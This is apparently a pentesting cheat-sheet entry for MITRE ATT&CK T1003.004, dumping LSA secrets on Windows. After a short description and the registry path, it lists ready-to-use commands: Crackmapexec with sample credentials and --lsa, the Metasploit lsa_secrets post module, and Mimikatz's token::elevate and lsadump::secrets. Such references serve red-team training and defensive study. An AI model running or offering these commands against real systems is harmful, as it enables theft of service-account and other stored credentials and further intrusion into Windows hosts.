LSA Secrets
https://attack.mitre.org/techniques/T1003/004/
ATT&CK ID: T1003.004
Permissions Required: SYSTEM
Description
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts. LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets
. LSA secrets can also be dumped from memory.
Techniques
Crackmapexec
crackmapexec smb '10.10.10.100' -u 'moe' -p 'Password123' --lsa

Metasploit
use post/windows/gather/lsa_secrets

Mimikatz
Invoke-Mimikatz -Command '"token::elevate" "lsadump::secrets"'

Last updated